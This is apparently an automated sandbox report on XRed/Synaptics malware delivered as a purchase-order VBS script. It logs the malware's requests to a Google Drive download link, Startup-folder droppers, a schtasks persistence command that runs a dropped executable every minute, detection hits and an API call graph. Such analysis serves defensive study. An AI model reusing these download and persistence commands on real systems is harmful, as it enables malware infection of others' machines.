2024-12-30 10:48:51 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:51 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7yaUzypYSlbbFQXaGO7KHVbJCwY9dk8ldLNJI01K7aekDcmuxHMBXpm7N7xS2QtSE6
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:51 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-EfXjMlrs8_4GcByW26NkzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:51 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:51 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="-pUwhAwyQGuMMfvrV3_zNQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:51 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
148 | 192.168.2.7 | 50194 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:51 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
149 | 192.168.2.7 | 50195 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:51 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy



                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:05:47:35
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs"
                                                                                                                                                        Imagebase:0x7ff7e10f0000
                                                                                                                                                        File size:170'496 bytes
                                                                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1311156718.0000019411790000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1311247337.0000019410D85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1308511468.000001941172A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1308437430.0000019411CC3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:8
                                                                                                                                                        Start time:05:47:41
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:1'989'120 bytes
                                                                                                                                                        MD5 hash:290A46D2614F4CE4F7AD75D2CEA2CE23
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000008.00000000.1309629259.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000008.00000000.1309629259.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Author: Joe Security
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        • Detection: 92%, ReversingLabs
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:11
                                                                                                                                                        Start time:05:47:52
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:1'989'120 bytes
                                                                                                                                                        MD5 hash:290A46D2614F4CE4F7AD75D2CEA2CE23
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

Target ID:14
Start time:05:47:52
Start date:30/12/2024
Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
Imagebase:0x400000
File size:1'989'120 bytes
MD5 hash:290A46D2614F4CE4F7AD75D2CEA2CE23
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Reputation:low
Has exited:true

Target ID:15
Start time:05:47:53
Start date:30/12/2024
Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
Imagebase:0x120000
File size:1'217'536 bytes
MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 68%, ReversingLabs
Reputation:low
Has exited:false

Target ID:16
Start time:05:47:54
Start date:30/12/2024
Path:C:\ProgramData\Synaptics\Synaptics.exe
Wow64 process (32bit):true
Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Imagebase:0x400000
File size:771'584 bytes
MD5 hash:B50AAC59E97F3D38A19ACB9253FABEBC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 92%, ReversingLabs
Reputation:low
Has exited:true

Target ID:17
Start time:05:47:56
Start date:30/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:18
Start time:05:47:56
Start date:30/12/2024
Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Imagebase:0x40000
File size:53'161'064 bytes
MD5 hash:4A871771235598812032C822E6F68F19
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:19
Start time:05:47:56
Start date:30/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:20
Start time:05:47:56
Start date:30/12/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
Imagebase:0xee0000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:05:47:56
Start date:30/12/2024
Path:C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):true
Commandline:WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs
Imagebase:0x750000
File size:147'456 bytes
MD5 hash:FF00E0480075B095948000BDC66E81F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000015.00000002.2552714676.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000015.00000002.2549958974.0000000002FBB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000015.00000002.2549958974.0000000002FDB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:false

Target ID:22
Start time:05:47:56
Start date:30/12/2024
Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
Imagebase:0x880000
File size:1'217'536 bytes
MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 68%, ReversingLabs
Has exited:true

Target ID:27
Start time:06:56:46
Start date:30/12/2024
Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
Imagebase:0x880000
File size:1'217'536 bytes
MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:06:56:54
Start date:30/12/2024
Path:C:\ProgramData\Synaptics\Synaptics.exe
Wow64 process (32bit):true
Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
Imagebase:0x400000
File size:771'584 bytes
MD5 hash:B50AAC59E97F3D38A19ACB9253FABEBC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:Borland Delphi
Has exited:true

Target ID:29
Start time:06:57:00
Start date:30/12/2024
Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
Imagebase:0x880000
File size:1'217'536 bytes
MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                        Target ID:30
                                                                                                                                                        Start time:06:57:02
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                                                                                                                                        Imagebase:0x880000
                                                                                                                                                        File size:1'217'536 bytes
                                                                                                                                                        MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:31
                                                                                                                                                        Start time:06:57:10
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
                                                                                                                                                        Imagebase:0x120000
                                                                                                                                                        File size:1'217'536 bytes
                                                                                                                                                        MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:34
                                                                                                                                                        Start time:06:57:19
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                                                                                                                                        Imagebase:0x880000
                                                                                                                                                        File size:1'217'536 bytes
                                                                                                                                                        MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:37
                                                                                                                                                        Start time:06:57:37
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7744 -s 13324
                                                                                                                                                        Imagebase:0x1b0000
                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:38
                                                                                                                                                        Start time:06:58:00
                                                                                                                                                        Start date:30/12/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                        Imagebase:0x880000
                                                                                                                                                        File size:1'217'536 bytes
                                                                                                                                                        MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:5.4%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:9.7%
                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                          Total number of Limit Nodes:43
API calls 87052->87053 87054 195299 87053->87054 87057 14010a 48 API calls 87054->87057 87056 13156d 87055->87056 87058 14010a 48 API calls 87055->87058 87056->86622 87063 1952a4 87057->87063 87059 1315af 87058->87059 87060 1315c2 87059->87060 87283 13d6b4 48 API calls 87059->87283 87060->86622 87062 14010a 48 API calls 87062->87063 87063->87050 87063->87062 87064->86581 87065->86592 87066->86592 87067->86588 87068->86592 87069->86582 87070->86588 87071->86588 87072->86601 87073->86633 87075 134537 87074->87075 87076 13469f 87074->87076 87078 134543 87075->87078 87079 197820 87075->87079 87077 12caee 48 API calls 87076->87077 87086 1345e4 Mailbox 87077->87086 87285 134040 87078->87285 87448 17e713 401 API calls Mailbox 87079->87448 87082 134639 Mailbox 87082->86599 87083 19782c 87083->87082 87449 16d520 85 API calls 4 library calls 87083->87449 87085 134559 87085->87082 87085->87083 87085->87086 87087 181f19 129 API calls 87086->87087 87300 16dce9 87086->87300 87305 13f55e 87086->87305 87314 1795af WSAStartup 87086->87314 87316 179500 87086->87316 87325 171080 87086->87325 87328 16efcd 87086->87328 87362 18352a 87086->87362 87441 1250ec 87086->87441 87445 176fc3 87086->87445 87087->87082 87097->86627 87098->86632 87099->86636 87998 12a9a0 87100->87998 87102 1336e7 87103 19a269 87102->87103 87104 133778 87102->87104 87163 133aa8 87102->87163 88015 16d520 85 API calls 4 library calls 87103->88015 88010 13bc04 85 API calls 87104->88010 87108 19a68d 87108->87163 88036 16d520 85 API calls 4 library calls 87108->88036 87109 133793 87109->87108 87161 13396b Mailbox _memmove 87109->87161 87109->87163 88003 1210e8 87109->88003 87111 19a3e9 88026 16d520 85 API calls 4 library calls 87111->88026 87112 13bc5c 48 API calls 87112->87161 87116 19a583 87120 12fa40 401 API calls 87116->87120 87117 19a45c 88030 16d520 85 API calls 4 library calls 87117->88030 87118 19a289 87118->87111 88016 12d2d2 87118->88016 87122 19a5b5 87120->87122 87132 12d380 55 API calls 87122->87132 
87122->87163 87125 13384e 87129 19a60c 87125->87129 87130 1338e5 87125->87130 87125->87161 87127 19a40f 88027 13cf79 49 API calls 87127->88027 87128 19a303 87140 19a317 87128->87140 87144 19a341 87128->87144 88035 16d231 50 API calls 87129->88035 87135 14010a 48 API calls 87130->87135 87136 19a5e6 87132->87136 87151 1338ec 87135->87151 88034 16d520 85 API calls 4 library calls 87136->88034 87137 12fa40 401 API calls 87137->87161 87139 19a42c 87141 19a44d 87139->87141 87142 19a441 87139->87142 88022 16d520 85 API calls 4 library calls 87140->88022 88029 16d520 85 API calls 4 library calls 87141->88029 88028 16d520 85 API calls 4 library calls 87142->88028 87148 19a366 87144->87148 87152 19a384 87144->87152 88023 17f211 401 API calls 87148->88023 87149 12d89e 50 API calls 87149->87161 87158 13399f 87151->87158 87153 19a37a 87152->87153 88024 17f4df 401 API calls 87152->88024 87153->87163 88025 13baef 48 API calls _memmove 87153->88025 87156 14010a 48 API calls 87156->87161 87159 12c935 48 API calls 87158->87159 87160 1339c0 87158->87160 87159->87160 87160->87163 87164 19a65e 87160->87164 87166 133a05 87160->87166 87161->87112 87161->87116 87161->87117 87161->87118 87161->87136 87161->87137 87161->87149 87161->87156 87161->87158 87161->87163 88011 12d500 53 API calls __cinit 87161->88011 88012 12d420 53 API calls 87161->88012 88013 13baef 48 API calls _memmove 87161->88013 88031 17d21a 81 API calls Mailbox 87161->88031 88032 1689e0 53 API calls 87161->88032 88033 12d772 55 API calls 87161->88033 87169 133ab5 Mailbox 87163->87169 88014 16d520 85 API calls 4 library calls 87163->88014 87165 12d89e 50 API calls 87164->87165 87165->87108 87166->87108 87166->87163 87167 133a95 87166->87167 87168 12d89e 50 API calls 87167->87168 87168->87163 87169->86599 87170->86599 87171->86609 87173 1284ba 87172->87173 87174 1284be 87172->87174 87173->86625 87175 195592 __i64tow 87174->87175 87176 1284d2 87174->87176 87177 195494 87174->87177 87184 1284ea __itow Mailbox _wcscpy 
87174->87184 88040 14234b 79 API calls 3 library calls 87176->88040 87178 19557a 87177->87178 87179 19549d 87177->87179 88041 14234b 79 API calls 3 library calls 87178->88041 87179->87184 87185 1954bc 87179->87185 87181 14010a 48 API calls 87183 1284f4 87181->87183 87183->87173 87186 12caee 48 API calls 87183->87186 87184->87181 87187 14010a 48 API calls 87185->87187 87186->87173 87188 1954d9 87187->87188 87189 14010a 48 API calls 87188->87189 87190 1954ff 87189->87190 87190->87173 87191 12caee 48 API calls 87190->87191 87191->87173 87192->86616 87194 17cd21 87193->87194 87198 17cd46 87193->87198 87195 12ca8e 48 API calls 87194->87195 87196 17cd2d 87195->87196 87215 17c8b7 87196->87215 87198->87039 87199->87038 87200->87045 87202 12cad0 87201->87202 87203 12ca9a 87201->87203 87204 12cae3 87202->87204 87205 12cad9 87202->87205 87209 14010a 48 API calls 87203->87209 87279 12c4cd 87204->87279 87206 127e53 48 API calls 87205->87206 87208 12cac6 87206->87208 87208->87045 87210 12caad 87209->87210 87211 194f11 87210->87211 87212 12cab8 87210->87212 87211->87208 87214 12d3d2 48 API calls 87211->87214 87212->87208 87213 12caee 48 API calls 87212->87213 87213->87208 87214->87208 87217 17c914 87215->87217 87218 17c8f7 87215->87218 87273 17c235 401 API calls Mailbox 87217->87273 87218->87217 87219 17c934 87218->87219 87220 17cc61 87218->87220 87219->87217 87251 15abf3 87219->87251 87221 17cc6e 87220->87221 87222 17cca9 87220->87222 87269 13d6b4 48 API calls 87221->87269 87222->87217 87227 17ccb6 87222->87227 87224 17c964 87224->87217 87225 17c973 87224->87225 87237 17c9a1 87225->87237 87255 15a8c8 87225->87255 87271 13d6b4 48 API calls 87227->87271 87228 17cc87 87270 1697b6 88 API calls 87228->87270 87232 17ccd6 87272 16503c 90 API calls Mailbox 87232->87272 87234 17cadc VariantInit 87243 17cb11 _memset 87234->87243 87238 17ca4a 87237->87238 87265 15a25b 105 API calls 87237->87265 87238->87234 87239 17ca86 VariantClear 87238->87239 87239->87238 87240 17caa5 SysAllocString 
87239->87240 87240->87238 87241 17cbb4 87267 16a6f6 102 API calls 87241->87267 87242 17cb8e 87266 17c235 401 API calls Mailbox 87242->87266 87243->87241 87243->87242 87245 17cbad 87247 17cc41 VariantClear 87245->87247 87248 17cc52 87247->87248 87248->87198 87249 17cbce 87249->87247 87268 16a6f6 102 API calls 87249->87268 87252 15ac16 87251->87252 87253 15ac04 __wsetenvp 87251->87253 87252->87224 87253->87252 87274 123bcf 87253->87274 87256 15a8f2 87255->87256 87257 15a9ed SysFreeString 87256->87257 87258 15aa7e 87256->87258 87259 15a90a 87256->87259 87260 15a9f9 87256->87260 87257->87260 87258->87259 87258->87260 87261 15aad9 SysFreeString 87258->87261 87262 15aac9 lstrcmpiW 87258->87262 87259->87237 87260->87259 87278 15a78a RaiseException 87260->87278 87261->87258 87262->87261 87264 15aafa SysFreeString 87262->87264 87264->87260 87265->87237 87266->87245 87267->87249 87268->87249 87269->87228 87270->87248 87271->87232 87272->87248 87273->87248 87275 123bd9 __wsetenvp 87274->87275 87276 14010a 48 API calls 87275->87276 87277 123bee _wcscpy 87276->87277 87277->87252 87278->87260 87280 12c4e7 87279->87280 87281 12c4da 87279->87281 87282 14010a 48 API calls 87280->87282 87281->87208 87282->87281 87283->87060 87284->87055 87286 19787b 87285->87286 87289 13406c 87285->87289 87451 16d520 85 API calls 4 library calls 87286->87451 87288 19788c 87452 16d520 85 API calls 4 library calls 87288->87452 87289->87288 87296 1340a6 _memmove 87289->87296 87291 134175 87297 134185 87291->87297 87450 17d21a 81 API calls Mailbox 87291->87450 87293 14010a 48 API calls 87293->87296 87294 1341f1 87294->87085 87295 12fa40 401 API calls 87295->87296 87296->87291 87296->87293 87296->87295 87296->87297 87298 1978d8 87296->87298 87297->87085 87453 16d520 85 API calls 4 library calls 87298->87453 87301 1284a6 80 API calls 87300->87301 87302 16dcfc 87301->87302 87454 166d6d 87302->87454 87304 16dd06 87304->87082 87466 12cdb4 87305->87466 87307 13f572 87308 1975d1 Sleep 87307->87308 87309 13f57a 
timeGetTime 87307->87309 87310 12cdb4 48 API calls 87309->87310 87311 13f590 87310->87311 87471 12e1f0 87311->87471 87315 1795e0 87314->87315 87315->87082 87317 12cdb4 48 API calls 87316->87317 87318 179515 87317->87318 87319 16be47 50 API calls 87318->87319 87320 179522 87319->87320 87321 17952f send 87320->87321 87322 179546 87321->87322 87323 179552 WSAGetLastError 87322->87323 87324 17956a 87322->87324 87323->87324 87324->87082 87737 1722e5 87325->87737 87327 171090 87327->87082 87329 1284a6 80 API calls 87328->87329 87330 16eff2 87329->87330 87921 1678ad GetFullPathNameW 87330->87921 87335 16f04b CoInitialize CoCreateInstance 87337 16f070 87335->87337 87338 16f08e 87335->87338 87340 16f07a CoUninitialize 87337->87340 87339 1284a6 80 API calls 87338->87339 87341 16f09d 87339->87341 87360 16f23c Mailbox 87340->87360 87360->87082 87363 12d3d2 48 API calls 87362->87363 87364 18354a 87363->87364 87365 12d3d2 48 API calls 87364->87365 87366 183553 87365->87366 87367 12d3d2 48 API calls 87366->87367 87368 18355c 87367->87368 87369 1284a6 80 API calls 87368->87369 87380 1835e9 Mailbox 87368->87380 87370 183580 87369->87370 87941 183d7b 87370->87941 87380->87082 87442 1250f6 87441->87442 87443 125105 87441->87443 87442->87082 87443->87442 87444 12510a CloseHandle 87443->87444 87444->87442 87446 1284a6 80 API calls 87445->87446 87447 176fd6 SetWindowTextW 87446->87447 87447->87082 87448->87083 87449->87082 87450->87294 87451->87288 87452->87297 87453->87297 87455 166d8a __wsetenvp 87454->87455 87456 166db3 GetFileAttributesW 87455->87456 87457 166dc5 GetLastError 87456->87457 87458 166de3 87456->87458 87459 166de7 87457->87459 87460 166dd0 CreateDirectoryW 87457->87460 87458->87304 